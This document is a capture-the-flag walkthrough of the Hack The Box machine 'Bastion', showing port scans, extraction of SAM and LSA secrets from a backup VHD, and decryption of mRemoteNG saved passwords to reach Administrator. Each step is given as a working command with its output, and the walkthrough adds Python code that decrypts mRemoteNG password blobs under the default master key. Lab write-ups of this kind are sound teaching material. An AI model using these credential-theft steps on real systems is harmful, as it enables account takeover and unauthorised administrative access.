Bastion
Enum
Nmap
# Nmap 7.80 scan initiated Wed May 26 12:59:43 2021 as: nmap -sCV -p- -oN enum/nmap 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.046s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m15s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-26T19:01:17+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-26T17:01:16
|_ start_date: 2021-05-26T16:55:07
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 26 13:01:23 2021 -- 1 IP address (1 host up) scanned in 100.10 seconds
SMB
┌──(bob㉿kali)-[~/htb/bastion]
└─$ smbclient -L \\10.10.10.134
Enter WORKGROUP\bob's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
User
We discover that there are .vhd images located in the Backups share.
From this blogpost we learn that we can extract the password hashes by mounting the VHD read-only:
guestmount --add 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
After copying the SECURITY, SAM and SYSTEM hives from /mnt/vhd/Windows/System32/config to our local machine, we can extract the hashes by running:
┌──(bob㉿kali)-[~/htb/bastion]
└─$ impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
Let's check whether the DefaultPassword from the LSA secrets works for the L4mpje account:
L4mpje:bureaulampje
┌──(bob㉿kali)-[~/htb/bastion]
└─$ crackmapexec smb 10.10.10.134 -u L4mpje -p bureaulampje
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [+] Bastion\bureaulampje:L4mpje
The credentials do not work via WinRM, but they do work via SSH.
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd
Privilege Escalation
Running Seatbelt.exe, we see some uncommon installed software: mRemoteNG, which stores its connection credentials in confCons.xml.
Following the steps in this post, we clone https://github.com/kmahyyg/mremoteng-decrypt and feed it the base64-encoded password string from confCons.xml:
┌──(bob㉿kali)-[~/htb/bastion/mremoteng-decrypt]
└─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
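What the decrypt script is doing, as an added example that is not the page's or the kmahyyg tool's code: mRemoteNG protects each password in confCons.xml with AES-256-GCM under a key derived by PBKDF2-SHA1 from the master password, which defaults to the publicly known string mR3m, so the audit helper below tells a defender whether a config is still relying on that default. It assumes the cryptography package (falling back to pycryptodome) is installed and uses the blob from this writeup as its sample input.

```python
import base64
import hashlib
import os

try:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    def _gcm_seal(key, nonce, data, aad):           # returns ciphertext||tag
        return AESGCM(key).encrypt(nonce, data, aad)
    def _gcm_open(key, nonce, body, aad):           # raises InvalidTag on a wrong key
        return AESGCM(key).decrypt(nonce, body, aad)
except ImportError:  # fall back to pycryptodome if 'cryptography' is absent
    from Crypto.Cipher import AES
    def _gcm_seal(key, nonce, data, aad):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce); c.update(aad)
        return b"".join(c.encrypt_and_digest(data))
    def _gcm_open(key, nonce, body, aad):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce); c.update(aad)
        return c.decrypt_and_verify(body[:-16], body[-16:])
# mRemoteNG's built-in master password: a confCons.xml never given its own
# master password is only protected by this publicly known string.
DEFAULT_MASTER_PASSWORD = "mR3m"
# Blob from this writeup's confCons.xml (the one decrypted above).
PAGE_BLOB = "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

def derive_key(master_password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA1, 1000 iterations, 32-byte key (AES-256), as mRemoteNG does
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, 1000, dklen=32)

def decrypt_blob(b64_blob: str, master_password: str = DEFAULT_MASTER_PASSWORD) -> str:
    """Blob layout: salt(16) | nonce(16) | ciphertext | GCM tag(16); the salt doubles as AAD."""
    raw = base64.b64decode(b64_blob)
    if len(raw) < 48:
        raise ValueError("blob too short to hold salt, nonce and tag")
    salt, nonce, body = raw[:16], raw[16:32], raw[32:]
    return _gcm_open(derive_key(master_password, salt), nonce, body, salt).decode("utf-8")

def encrypt_blob(plaintext: str, master_password: str = DEFAULT_MASTER_PASSWORD) -> str:
    """Build a blob in the same layout, so the scheme can be exercised end to end."""
    salt, nonce = os.urandom(16), os.urandom(16)
    body = _gcm_seal(derive_key(master_password, salt), nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + body).decode("ascii")

def uses_default_master_password(b64_blob: str) -> bool:
    """Audit: True means the stock password opens the blob, so the file is effectively cleartext."""
    try:
        decrypt_blob(b64_blob, DEFAULT_MASTER_PASSWORD)
        return True
    except Exception:  # authentication-tag failure on a wrong key, or malformed input
        return False
```

Running uses_default_master_password over every Protected value in a confCons.xml is a quick way to find installs whose saved credentials are readable by anyone with access to the user's profile.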
With the decrypted password we get access as Administrator.
┌──(bob㉿kali)-[~/htb/bastion/mremoteng-decrypt]
└─$ evil-winrm -i 10.10.10.134 -u Administrator -p thXLHM96BeKL0ER2
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>